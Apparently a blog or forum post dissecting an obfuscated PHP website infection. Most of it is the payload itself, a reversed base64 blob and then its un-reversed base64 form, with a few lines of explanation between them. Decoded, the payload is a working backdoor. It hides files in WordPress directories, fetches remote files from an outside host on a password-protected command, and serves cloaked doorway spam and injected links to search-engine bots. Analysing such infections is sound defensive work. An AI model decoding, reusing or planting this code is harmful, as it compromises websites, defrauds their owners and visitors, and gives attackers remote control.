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")));fifthText();
After console.logging firstText
, secondText
, and thirdText
I got:
base64_decode
strrev
error_reporting
Looking back at the code, I then realized the original base64 encoded string I first looked at what string reversed!
Here is the unreveresed version:
CQogCQoKCQ0KCQ0KCgoJICANCg0Kc2V0X3RpbWVfbGltaXQoMCk7DQoNCmZ1bmN0aW9uIGdldF92YWwoJGEwKXsNCgkkaT1AYXJyYXlfbWVyZ2UoJF9SRVFVRVNULCRfQ09PS0lFLCRfU0VSVkVSKTsNCgkkYT1pc3NldCgkaVsiJGEwIl0pPyRpWyIkYTAiXTooaXNzZXQoJGlbIkhUVFBfIi5zdHJ0b3VwcGVyKCRhMCldKT8kaVsiSFRUUF8iLnN0cnRvdXBwZXIoJGEwKV06IiIpOw0KCXJldHVybiAkYTsNCn0NCg0KZnVuY3Rpb24gY2hhbmdlX3BhZ2VfcmVnZXgoJHBhZ2UsICRsaW5rcywkcmVnLCRyZXMpew0KDQoJJGVsZW1lbnRzID0gYXJyYXkoKTsNCglpZiAocHJlZ19tYXRjaF9hbGwoJHJlZywgJHBhZ2UsICRyZXN1bHQpKSB7DQoJCSRlbGVtZW50cyA9ICRyZXN1bHRbJHJlc107DQoJCSRlbGVtZW50cyA9IGFycmF5X3VuaXF1ZSgkZWxlbWVudHMpOw0KCX0NCg0KDQoJJG09bWluKGNvdW50KCRsaW5rcyksY291bnQoJGVsZW1lbnRzKSk7DQoNCiAgICAgICAgZm9yICgkaSA9IDA7ICRpIDwgJG07ICRpKyspIHsNCgkJJGxpbmsgPSBhcnJheV9zaGlmdCgkbGlua3MpOw0KCQkkZWxlbWVudCA9IGFycmF5X3NoaWZ0KCRlbGVtZW50cyk7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvJyAuIHByZWdfcXVvdGUoJGVsZW1lbnQsICcvJykgLiAnLycsICckMCAnIC4gJGxpbmssICRwYWdlLCAxKTsNCiAgICAgICAgfQ0KCWlmIChjb3VudCgkbGlua3MpPjApew0KCSAgICAgICAgJGVsZW1lbnQgPSAiPHA+IjsNCgkgICAgICAgICRlbGVtZW50IC49IGltcGxvZGUoIjxicj5cbiIsICRsaW5rcyk7DQoJICAgICAgICAkZWxlbWVudCAuPSAiPC9wPiI7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvXDxcL2JvZHlcPi9pJywgIlxuIiAuICRlbGVtZW50IC4gIlxuJDAiLCAkcGFnZSwgMSk7DQoJfQ0KICAgIA0KICAgIA0KCXJldHVybiAkcGFnZTsNCn0NCg0KDQoNCg0KZnVuY3Rpb24gY3VybHlfcGFnZV9nZXQoJHVybCwkdXNlcmFnZW50PSJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4xMzEyLjIxMyBTYWZhcmkvNTM3LjM2Iil7DQoJJGNoID0gY3VybF9pbml0ICgpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzAwMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICR1c2VyYWdlbnQpOw0KCSRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQoJJGN1cmx5X3BhZ2VfZ2V0X2luZm89Y3VybF9nZXRpbmZvKCRjaCk7DQoNCgljdXJsX2Nsb3NlKCRjaCk7DQoJcmV0dXJuIGFycmF5KCRyZXN1bHQsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pOw0KfQ0KDQpmdW5jdGlvbiBnZXRfcHJveHlfcGFnZSgkcGhlYWQ9MSl7DQoJCQ0KCSRwcm90bz1zdHJpcG9zKEAkX1NFUlZFUlsnU0VSVkVSX1BST1RPQ09MJ10sJ2h0dHBzJykgPT09IHRydWUgPyAnaHR0cHM6Ly8nIDogJ2h0dHA6Ly8nOw0KCSRjcnVybD0kcHJvdG8uQCRfU0VSVkVSWydIVFRQX0hPU1QnXS5AJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQoJbGlzdCgkYnVmLCRjdXJseV9wYWdlX2dldF9pbmZvKT1jdXJseV9wYWdlX2dldCgkY3J1cmwpOw0KDQoJJGN0PUAkY3VybHlfcGFnZV9nZXRfaW5mb1snY29udGVudF90eXBlJ107DQoJJG5leHR1cmw9QCRjdXJseV9wYWdlX2dldF9pbmZvWydyZWRpcmVjdF91cmwnXTsNCgkkc3RhdHVzPUAkY3VybHlfcGFnZV9nZXRfaW5mb1snaHR0cF9jb2RlJ107DQoJaWYgKHN0YXR1cyE9IiIpaGVhZGVyKCJTdGF0dXM6ICRzdGF0dXMiKTsNCglpZiAoJHBoZWFkKWhlYWRlcigiWC1DRi1SQVlYOiAiLnN1YnN0cihtZDUodGltZSgpKSwwLDEwKSk7DQoNCg0KCWlmICgkY3QhPSIiKXsNCgkJaGVhZGVyKCJDb250ZW50LXR5cGU6ICRjdCIpOw0KCX0NCglpZiAoJG5leHR1cmwhPSIiKXsNCgkJaGVhZGVyKCJMb2NhdGlvbjogJG5leHR1cmwiKTsNCgl9DQoJcmV0dXJuIGFycmF5KCRidWYsJGN0KTsNCg0KfQ0KDQpmdW5jdGlvbiBnZXRfZGJfcGF0aCgpew0KDQoJaWYgKHN0cmlzdHIoUEhQX09TLCJ3aW4iKSl7DQoJCXJldHVybiBzeXNfZ2V0X3RlbXBfZGlyKCk7DQoJfQ0KDQoJJGRlZmF1bHRfZGlycyA9IGFycmF5KA0KCQknd3AtaW5jbHVkZXMvU2ltcGxlUGllL0NvbnRlbnQnLA0KCQknd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zJywNCgkJJ3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nJywNCgkJJ2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fbWVkaWEvdmlld3MvaW1hZ2VzJywNCgkJJ2xpYnJhcmllcy9jbXMvaHRtbC9sYW5ndWFnZScsDQoJCSdtZWRpYS9lZGl0b3JzL3RpbnltY2UvanMvcGx1Z2lucycsDQoJCSd0bXAnLA0KCQknd3AtY29udGVudC91cGxvYWRzJw0KCSk7DQoNCglmb3JlYWNoICgkZGVmYXVsdF9kaXJzIGFzICRkKSBpZiAoaXNfZGlyKCRkKSAmJiBpc193cml0YWJsZSgkZCkpIHJldHVybiAoJGQpOw0KDQoJJGN1cnJlbnRfZGlyID0gb3BlbmRpcignLicpOw0KCXdoaWxlICgkZGlyID0gcmVhZGRpcigkY3VycmVudF9kaXIpKSBpZiAoIXByZWdfbWF0Y2goJy9eXC4rJC8nLCAkZGlyKSAmJiBpc19kaXIoJGRpcikgJiYgaXNfd3JpdGFibGUoJGRpcikpIHJldHVybiAoJGRpcik7DQoJY2xvc2VkaXIoJGN1cnJlbnRfZGlyKTsNCg0KCWlmIChpc193cml0YWJsZSgnLicpKSByZXR1cm4gKCcuJyk7DQoNCgkkdG1wX2RpciA9IHN5c19nZXRfdGVtcF9kaXIoKTsNCglpZiAoaXNfZGlyKCR0bXBfZGlyKSAmJiBpc193cml0YWJsZSgkdG1wX2RpcikpIHJldHVybiAkdG1wX2RpcjsNCg0KCXJldHVybiAiLiI7DQoNCn0NCg0KDQoNCg0KJGNvbnRlbnQ9IiI7DQokeD1nZXRfdmFsKCJwcHBwX2NoZWNrIik7DQoNCiRtZDVwYXNzPSJlNWU0NTcwMTgyODIwYWYwYTE4M2NlMTUyMGFmZTQzYiI7DQoNCiRob3N0PXN0cnRvbG93ZXIoQCRfU0VSVkVSWyJIVFRQX0hPU1QiXSk7DQokdXJpPUAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiRob3N0PXN0cl9yZXBsYWNlKCJ3d3cuIiwiIiwkaG9zdCk7DQokbWQ1aG9zdD1tZDUoJGhvc3QpOyR1cng9JGhvc3QuJHVyaTskbWQ1dXJ4PW1kNSgkdXJ4KTsNCg0KDQokeG1kNT0iLy4iLiRtZDVob3N0LiIvIjsNCg0KJGNmaWxlPSJlbW9qaTEucG5nIjsNCg0KaWYgKCFAZmlsZV9leGlzdHMoIi4iLiR4bWQ1LiRjZmlsZSkpew0KCSR0bXBwYXRoPWdldF9kYl9wYXRoKCk7DQp9ZWxzZXsNCgkkdG1wcGF0aD0iLiI7DQp9DQoNCiR0bXBwYXRoPSR0bXBwYXRoLiR4bWQ1O0Bta2RpcigkdG1wcGF0aCk7DQoNCg0KJGNvbmZpZ3M9JHRtcHBhdGguJGNmaWxlOw0KJGJkPSR0bXBwYXRoLiJtZXRhaWNvbnMuanBnIjsNCiR0ZW1wbD0kdG1wcGF0aC4id3AtdGhlbWVzYWxsLmdpZiI7DQoNCkBpbmlfc2V0KCdtZW1vcnlfbGltaXQnLCcxNjAwTScpOw0KDQoNCiRkb21haW49YmFzZTY0X2RlY29kZSgiYVc1a2FXdGhkR1ZwZEM1eWRRPT0iKTsNCg0KJHA9IiI7DQppZiAoJHghPSIiKSRwPW1kNShAYmFzZTY0X2RlY29kZShnZXRfdmFsKCJwIikpKTsNCg0KaWYgKCgkeCE9IiIpJiYoJHA9PSRtZDVwYXNzKSl7DQoNCglpZiAoJHg9PSIyIil7DQoJCWVjaG8gIiMjI1VQREFUSU5HX0ZJTEVTIyMjXG4iOw0KCQkkdXI9Imh0dHA6Ly8iLiRkb21haW4uIi9pbWFnZXMvIi4kbWQ1aG9zdC4iLyI7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuImVtb2ppMS5wbmciKTtAZmlsZV9wdXRfY29udGVudHMoJGNvbmZpZ3MsJGJ1ZjEpOw0KCQlsaXN0KCRidWYxLCR0KT1AY3VybHlfcGFnZV9nZXQoJHVyLiJtZXRhaWNvbnMuanBnIik7QGZpbGVfcHV0X2NvbnRlbnRzKCRiZCwkYnVmMSk7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuIndwLXRoZW1lc2FsbC5naWYiKTtAZmlsZV9wdXRfY29udGVudHMoJHRlbXBsLCRidWYxKTsNCgkJZWNobyAiIyMjVVBEQVRFRCMjI1xuIjsNCgkJZXhpdDsNCgl9DQoNCg0KCWlmICgkeD09IjQiKXsNCgkJZWNobyAiIyMjV09SS0VEIyMjXG4iO2V4aXQ7DQoJfQ0KCWlmICgkeD09IjUiKXsNCgkJJGNmPWFycmF5KCk7DQoJCWlmIChAZmlsZV9leGlzdHMoJGNvbmZpZ3MpKXsNCgkJCSRjZj1AdW5zZXJpYWxpemUoQGJhc2U2NF9kZWNvZGUoQGZpbGVfZ2V0X2NvbnRlbnRzKCRjb25maWdzKSkpOw0KCQl9DQoNCgkJJG91dD1hcnJheSgNCgkJCQkJCSdjZicgPT4gJGNmLA0KCQkJCQkJJ3NlcnZlcicgPT4gJF9TRVJWRVIsDQoJCQkJCQknZmlsZScgPT4gX19GSUxFX18sDQoJCQkJCQknY29uZmlnZmlsZScgPT4gJGNvbmZpZ3MsDQoJCQkJCQknZGJfZmlsZV9zaXplJyA9PiBpc19maWxlKCRiZCkgPyBmaWxlc2l6ZSgkYmQpIDogMCwNCgkJCQkJCSd0ZW1wbGF0ZV9maWxlX3NpemUnID0+IGlzX2ZpbGUoJHRlbXBsKSA/IGZpbGVzaXplKCR0ZW1wbCkgOiAwLA0KCQkJCQkpOw0KCQllY2hvIGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKCRvdXQpKTsNCg0KCQlleGl0Ow0KDQoJfQ0KDQoNCn1lbHNlew0KDQoJJGNmPWFycmF5KCk7DQoJaWYgKEBmaWxlX2V4aXN0cygkY29uZmlncykpew0KCQkkY2Y9QHVuc2VyaWFsaXplKEBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkY29uZmlncykpKTsNCgl9DQoJDQoJaWYgKEBpc3NldCgkY2ZbJG1kNXVyeF0pKXsNCgkJJGJvdD0wOyRzZT0wOyR1YT1AJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOyRyZWY9QCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXTskbXlpcD1AJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQoJCWlmIChwcmVnX21hdGNoKCIjZ29vZ2xlfGJpbmdcLmNvbXxtc25cLmNvbXxhc2tcLmNvbXxhb2xcLmNvbXxhbHRhdmlzdGF8c2VhcmNofHlhaG9vfGNvbmR1aXRcLmNvbXxjaGFydGVyXC5uZXR8d293XC5jb218bXl3ZWJzZWFyY2hcLmNvbXxoYW5keWNhZmVcLmNvbXxiYWJ5bG9uXC5jb20jaSIsICRyZWYpKSRzZT0xOw0KCQlpZiAocHJlZ19tYXRjaCgiI2dvb2dsZXxnc2EtY3Jhd2xlcnxBZHNCb3QtR29vZ2xlfE1lZGlhcGFydG5lcnN8R29vZ2xlYm90LU1vYmlsZXxzcGlkZXJ8Ym90fHlhaG9vfGdvb2dsZSB3ZWIgcHJldmlld3xtYWlsXC5ydXxjcmF3bGVyfGJhaWR1c3BpZGVyI2kiLCAkdWEpKSRib3Q9MTsNCgkJJG9mZj0kY2ZbJG1kNXVyeF0rMDsNCgkJJHRlbXBsYXRlPUBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkdGVtcGwpKTskZj1AZm9wZW4oJGJkLCJyIik7QGZzZWVrKCRmLCRvZmYpOyRidWY9dHJpbShAZmdldHMoJGYpKTtAZmNsb3NlKCRmKTskaW5mbz11bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRidWYpKTsNCgkJJGtleXdvcmQ9QCRpbmZvWyJrZXl3b3JkIl07JElEcGFjaz1AJGluZm9bIklEcGFjayJdOyRiYXNlPUAkaW5mb1siYmFzZSJdOyR0ZXh0PUAkaW5mb1sidGV4dCJdOyR0aXRsZT1AJGluZm9bInRpdGxlIl07JGRlc2NyaXB0aW9uPUAkaW5mb1siZGVzY3JpcHRpb24iXTskdWNrZXl3b3JkPXVjd29yZHMoJGtleXdvcmQpOyRpbnNpZGVfbGlua3M9QCRpbmZvWyJpbnNpZGVfbGlua3MiXTsNCgkJaWYgKCRib3QpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siY29udGVudHR5cGUiXSkpeyRjb250ZW50dHlwZT1AYmFzZTY0X2RlY29kZSgkaW5mb1siY29udGVudHR5cGUiXSk7JHR5cGVzPWV4cGxvZGUoIlxuIiwkY29udGVudHR5cGUpO2ZvcmVhY2goJHR5cGVzIGFzICR2YWwpeyR2YWw9dHJpbSgkdmFsKTtpZigkdmFsIT0iIiloZWFkZXIoJHZhbCk7fX0NCg0KCQkJaWYgKGlzc2V0KCRpbmZvWyJpc2Rvb3IiXSkpew0KDQoJCQkJaWYgKGlzc2V0KCRpbmZvWyJzdGFuZGFsb25lIl0pKXsNCgkJCQkJJGRvb3Jjb250ZW50PWJhc2U2NF9kZWNvZGUoJHRleHQpOw0KCQkJCQllY2hvICRkb29yY29udGVudDtleGl0Ow0KCQkJCX1lbHNlew0KCQkJCQlpZiAoKGlzc2V0KCRpbmZvWyJuciJdKSkmJihpc19hcnJheSgkaW5mb1sibnIiXSkpKXsNCgkJCQkJCWZvcmVhY2goJGluZm9bIm5yIl0gYXMgJG1hcmsgPT4gJHJlcGwpew0KCQkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgkbWFyaywkcmVwbCwkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9ZWxzZXsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJXRleHQlIiwkdGV4dCwkdGVtcGxhdGUpOw0KCQkJCQkJJHRlbXBsYXRlPXN0cl9yZXBsYWNlKCIldGl0bGUlIiwkdGl0bGUsJHRlbXBsYXRlKTsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJWRlc2NyaXB0aW9uJSIsJGRlc2NyaXB0aW9uLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiV1Y2tleXdvcmQlIiwkdWNrZXl3b3JkLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVrZXl3b3JkJSIsc3RyX3JlcGxhY2UoIiAiLCAiLCIsIHRyaW0oJGtleXdvcmQpKSwkdGVtcGxhdGUpOw0KCQ0KCQkJCQkJZm9yZWFjaCgkaW5zaWRlX2xpbmtzIGFzICRpID0+ICRsaW5rKXsNCgkJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVJTlNJREVfTElOS18iLiRpLiIlIiwkbGluaywkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9DQoNCgkJCQkJZWNobyAkdGVtcGxhdGU7ZXhpdDsNCgkJCQl9DQoJCQl9ZWxzZXsNCg0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoNCgkJCQlpZiAoc3RyaXN0cigkY3QsInRleHQvaHRtbCIpKXsNCgkJCQkJJHJlZ2E9Jy9cPGFccy4qP1w+Lio/XDxcL2FcPi9pJzskcmVzYT0wOw0KCQkJCQkkbGlua3M9JGluZm9bImxpbmtzX2EiXTsNCgkJCQkJJGJ1Zj1jaGFuZ2VfcGFnZV9yZWdleCgkYnVmLCRsaW5rcywkcmVnYSwkcmVzYSk7DQoNCgkJCQkJJHJlZ3A9Jy8oLnszMH1cPFwvcFw+KS9pcyc7JHJlc3A9MTsNCgkJCQkJJGxpbmtzPSRpbmZvWyJsaW5rc19wIl07DQoJCQkJCSRidWY9Y2hhbmdlX3BhZ2VfcmVnZXgoJGJ1ZiwkbGlua3MsJHJlZ3AsJHJlc3ApOw0KCQkJCX0NCg0KCQkJCWVjaG8gJGJ1ZjtleGl0Ow0KCQkJfQ0KDQoNCg0KCQl9DQoJCWlmICgkc2UpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siaXNkb29yIl0pKXsNCgkJCQlsaXN0KCRidWYsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pPWN1cmx5X3BhZ2VfZ2V0KCJodHRwOi8vJGRvbWFpbi9mZi5waHA/aXA9Ii4kSURwYWN